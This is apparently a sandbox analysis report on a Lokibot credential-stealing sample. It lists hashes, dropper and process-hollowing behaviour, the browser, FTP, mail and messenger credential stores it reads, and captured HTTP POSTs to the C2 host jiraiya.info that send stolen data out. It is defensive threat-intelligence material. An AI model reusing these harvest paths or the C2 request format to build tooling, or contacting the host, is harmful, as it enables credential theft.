2* ID: 1105
3* MalFamily: "Lokibot"
4
5* MalScore: 10.0
6
7* File Name: "Exes_9441e9e3ea30f1768c266c5107d828d4.exe"
8* File Size: 905216
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "0f448c200f7ed69bb37205a9f63413574b5df77927d955e01484643643a7cff2"
11* MD5: "9441e9e3ea30f1768c266c5107d828d4"
12* SHA1: "82582d49f19ca542de27a2a194f565277aecd7d8"
13* SHA512: "c6ae116d64dd6e2d4bec4a1dff880497fd5bc53c8cf479a8c84d3353ad9741e28db56f81d52bce5aaa843b41a8523d611272b84ef48098a48d692fe27475d462"
14* CRC32: "AD65EBFD"
15* SSDEEP: "3072:FXUyupFUtZvVm10gicxhOr+LHeFf6Xw3Q/tIlXjLdUXmjcziJX5:FXspFSA1ScxhxeFf2wItwyr"
16
17* Process Execution:
18 "0ZSgD8YVypOh.exe",
19 "wscript.exe",
20 "filename.exe",
21 "filename.exe",
22 "explorer.exe",
23 "services.exe",
24 "lsass.exe",
25 "WmiApSrv.exe",
26 "svchost.exe",
27 "WMIADAP.exe",
28 "WmiPrvSE.exe"
29
30
31* Executed Commands:
32 "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
33 "C:\\Users\\user\\subfolder\\filename.vbs ",
34 "\"C:\\Users\\user\\subfolder\\filename.exe\"",
35 "C:\\Users\\user\\subfolder\\filename.exe ",
36 "C:\\Windows\\system32\\lsass.exe",
37 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
38 "C:\\Windows\\system32\\svchost.exe -k netsvcs"
39
40
41* Signatures Detected:
42
43 "Description": "Behavioural detection: Executable code extraction",
44 "Details":
45
46
47 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
48 "Details":
49
50
51 "Description": "Creates RWX memory",
52 "Details":
53
54
55 "Description": "Possible date expiration check, exits too soon after checking local time (weak signal on its own: the initial process 0ZSgD8YVypOh.exe is a dropper that hands off to the .vbs and .exe it writes, so a quick exit after reading the clock is equally consistent with a plain dropper finishing its job rather than a kill-date check)",
56 "Details":
57
58 "process": "0ZSgD8YVypOh.exe, PID 1480"
59
60
61
62
63 "Description": "Detected script timer window indicative of sleep style evasion",
64 "Details":
65
66 "Window": "WSH-Timer"
67
68
69
70
71 "Description": "A process attempted to delay the analysis task.",
72 "Details":
73
74 "Process": "filename.exe tried to sleep 1804 seconds, actually delayed analysis time by 0 seconds"
75
76
77
78
79 "Description": "Reads data out of its own binary image",
80 "Details":
81
82 "self_read": "process: 0ZSgD8YVypOh.exe, pid: 1480, offset: 0x00000000, length: 0x000dd000"
83
84
85 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00000000, length: 0x00000040"
86
87
88 "self_read": "process: wscript.exe, pid: 2768, offset: 0x000000f0, length: 0x00000018"
89
90
91 "self_read": "process: wscript.exe, pid: 2768, offset: 0x000001e8, length: 0x00000078"
92
93
94 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018000, length: 0x00000020"
95
96
97 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018058, length: 0x00000018"
98
99
100 "self_read": "process: wscript.exe, pid: 2768, offset: 0x000181a8, length: 0x00000018"
101
102
103 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018470, length: 0x00000010"
104
105
106 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018640, length: 0x00000012"
107
108
109
110
111 "Description": "A process created a hidden window",
112 "Details":
113
114 "Process": "0ZSgD8YVypOh.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
115
116
117 "Process": "0ZSgD8YVypOh.exe -> C:\\Users\\user\\subfolder\\filename.exe"
118
119
120
121
122 "Description": "Drops a binary and executes it",
123 "Details":
124
125 "binary": "C:\\Users\\user\\subfolder\\filename.exe"
126
127
128
129
130 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic (the HTTP/1.0 POSTs captured below carry the User-Agent 'Mozilla/4.08 (Charon; Inferno)' and a non-standard 'Content-Key' request header; together with the /fre.php C2 path these are the durable network indicators and are what the ET 'LokiBot User-Agent (Charon/Inferno)' signature later in this report keys on - the domain and IP are more likely to be rotated than the protocol fingerprint)",
131 "Details":
132
133 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
134
135
136 "http_version_old": "HTTP traffic uses version 1.0"
137
138
139 "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php"
140
141
142
143
144 "Description": "Performs some HTTP requests",
145 "Details":
146
147 "url_iocs": "http://jiraiya.info/joe23/five/fre.php"
148
149
150
151
152 "Description": "A scripting utility was executed",
153 "Details":
154
155 "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
156
157
158
159
160 "Description": "Sniffs keystrokes (SetWindowsHookExW observed; note the hooking process recorded below is explorer.exe, which does not appear in the sample's drop or injection chain - the only injection reported is filename.exe(2696) -> filename.exe(2400) - so treat this as unconfirmed sandbox noise unless the sample is shown to have injected into explorer.exe)",
161 "Details":
162
163 "SetWindowsHookExW": "Process: explorer.exe(2044)"
164
165
166
167
168 "Description": "Behavioural detection: Injection (Process Hollowing)",
169 "Details":
170
171 "Injection": "filename.exe(2696) -> filename.exe(2400)"
172
173
174
175
176 "Description": "Executed a process and injected code into it, probably while unpacking",
177 "Details":
178
179 "Injection": "filename.exe(2696) -> filename.exe(2400)"
180
181
182
183
184 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time (the process credited below is services.exe, PID 500, a Windows system process that the sample is not shown injecting into; this is most likely sandbox monitoring noise rather than sample behaviour and should not be used as a detection point)",
185 "Details":
186
187 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 2586520 times"
188
189
190
191
192 "Description": "Steals private information from local Internet browsers",
193 "Details":
194
195 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
196
197
198
199
200 "Description": "Installs itself for autorun at Windows startup (HKCU Run value; note that 'Registry Key Name', 'subfolder' and 'filename.vbs' appear to be sandbox placeholders for the real value name and path and should not be used verbatim as IOCs - the concrete on-disk artefacts to hunt for are the hidden %APPDATA% directory and executable listed under 'Creates a hidden or system file')",
201 "Details":
202
203 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
204
205
206 "data": "C:\\Users\\user\\subfolder\\filename.vbs -Dirra"
207
208
209
210
211 "Description": "Creates a hidden or system file (the directory name 474604 and file name 45B65D are substrings of the mutex 6EFA73A4746045B65DEE781E listed under Mutexes - characters 8-13 and 13-18 respectively - and the same 24-character string appears UTF-16-encoded in the exfiltration POST body below; all three are therefore the same identifier and are likely per-host, so match on the pattern %APPDATA%\\<6 hex>\\<6 hex>.exe rather than on these exact values)",
212 "Details":
213
214 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
215
216
217 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
218
219
220
221
222 "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious (all 18 verdicts listed below are generic or heuristic labels - none names LokiBot - so the family attribution in this report rests on the behavioural findings and the ET 'LokiBot' network signatures, not on AV naming)",
223 "Details":
224
225 "MicroWorld-eScan": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
226
227
228 "Cybereason": "malicious.3ea30f"
229
230
231 "Arcabit": "Trojan.Heur.VP2.E18DB1"
232
233
234 "Invincea": "heuristic"
235
236
237 "Symantec": "ML.Attribute.HighConfidence"
238
239
240 "APEX": "Malicious"
241
242
243 "BitDefender": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
244
245
246 "Ad-Aware": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
247
248
249 "Emsisoft": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi (B)"
250
251
252 "FireEye": "Generic.mg.9441e9e3ea30f176"
253
254
255 "SentinelOne": "DFI - Suspicious PE"
256
257
258 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
259
260
261 "Endgame": "malicious (moderate confidence)"
262
263
264 "AegisLab": "Worm.Win32.WBNA.loM5"
265
266
267 "GData": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
268
269
270 "Acronis": "suspicious"
271
272
273 "MAX": "malware (ai score=89)"
274
275
276 "Qihoo-360": "HEUR/QVM03.0.A7BD.Malware.Gen"
277
278
279
280
281 "Description": "Creates a copy of itself",
282 "Details":
283
284 "copy": "C:\\Users\\user\\subfolder\\filename.exe"
285
286
287 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
288
289
290
291
292 "Description": "Harvests credentials from local FTP client softwares",
293 "Details":
294
295 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
296
297
298 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
299
300
301 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
302
303
304 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
305
306
307 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
308
309
310 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
311
312
313 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
314
315
316 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
317
318
319 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
320
321
322 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
323
324
325
326
327 "Description": "Harvests information related to installed instant messenger clients",
328 "Details":
329
330 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
331
332
333
334
335 "Description": "Harvests information related to installed mail clients",
336 "Details":
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
381
382
383 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
384
385
386 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
387
388
389 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
390
391
392 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
393
394
395 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
396
397
398 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
399
400
401 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
402
403
404 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
405
406
407 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
408
409
410 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
411
412
413 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
414
415
416 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
417
418
419 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
420
421
422 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
423
424
425 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
426
427
428 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
429
430
431 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
432
433
434 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
435
436
437 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
438
439
440 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
441
442
443
444
445 "Description": "Collects information to fingerprint the system",
446 "Details":
447
448
449 "Description": "Created network traffic indicative of malicious activity",
450 "Details":
451
452 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
453
454
455 "signature": "ET TROJAN LokiBot Fake 404 Response"
456
457
458 "signature": "ET TROJAN LokiBot Checkin"
459
460
461 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
462
463
464 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
465
466
467 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
468
469
470 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
471
472
473
474
475
476* Started Service:
477 "VaultSvc",
478 "wmiApSrv"
479
480
481* Mutexes:
482 "Local\\ZoneAttributeCacheCounterMutex",
483 "Local\\ZonesCacheCounterMutex",
484 "Local\\ZonesLockedCacheCounterMutex",
485 "6EFA73A4746045B65DEE781E",
486 "Global\\RefreshRA_Mutex_Lib",
487 "Global\\RefreshRA_Mutex",
488 "Global\\RefreshRA_Mutex_Flag",
489 "Global\\WmiApSrv",
490 "Global\\ADAP_WMI_ENTRY"
491
492
493* Modified Files:
494 "C:\\Users\\user\\subfolder\\filename.exe",
495 "C:\\Users\\user\\subfolder\\filename.vbs",
496 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
497 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
498
499
500* Deleted Files:
501 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
502 "C:\\Users\\user\\subfolder\\filename.exe"
503
504
505* Modified Registry Keys:
506 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
507 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
508 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.106\\CheckSetting",
509 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.100\\CheckSetting",
510 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.102\\CheckSetting",
511 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.101\\CheckSetting",
512 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.104\\CheckSetting",
513 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.103\\CheckSetting",
514 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\S38OS404-1Q43-42S2-9305-67QR0O28SP23\\rkcybere.rkr",
515 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
516 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting",
517 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
518 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name",
519 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
520 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
521 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed"
522
523
524* Deleted Registry Keys:
525 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
526 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
527 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
528 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
529 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
530 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
531
532
533* DNS Communications:
534
535 "type": "A",
536 "request": "jiraiya.info",
537 "answers":
538
539 "data": "47.88.102.244",
540 "type": "A"
541
542
543
544
545
546* Domains:
547
548 "ip": "47.88.102.244",
549 "domain": "jiraiya.info"
550
551
552
553* Network Communication - ICMP:
554
555* Network Communication - HTTP:
556
557 "count": 2,
558 "body": "",
559 "uri": "http://jiraiya.info/joe23/five/fre.php",
560 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
561 "method": "POST",
562 "host": "jiraiya.info",
563 "version": "1.0",
564 "path": "/joe23/five/fre.php",
565 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
566 "port": 80
567
568
569 "count": 30,
570 "body": "",
571 "uri": "http://jiraiya.info/joe23/five/fre.php",
572 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
573 "method": "POST",
574 "host": "jiraiya.info",
575 "version": "1.0",
576 "path": "/joe23/five/fre.php",
577 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
578 "port": 80
579
580
581 "count": 1,
582 "body": "\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
583 "uri": "http://jiraiya.info/joe23/five/fre.php",
584 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
585 "method": "POST",
586 "host": "jiraiya.info",
587 "version": "1.0",
588 "path": "/joe23/five/fre.php",
589 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
590 "port": 80
591
592
593
594* Network Communication - SMTP:
595
596* Network Communication - Hosts:
597
598 "country_name": "United States",
599 "ip": "47.88.102.244",
600 "inaddrarpa": "",
601 "hostname": "jiraiya.info"
602
603
604
605* Network Communication - IRC: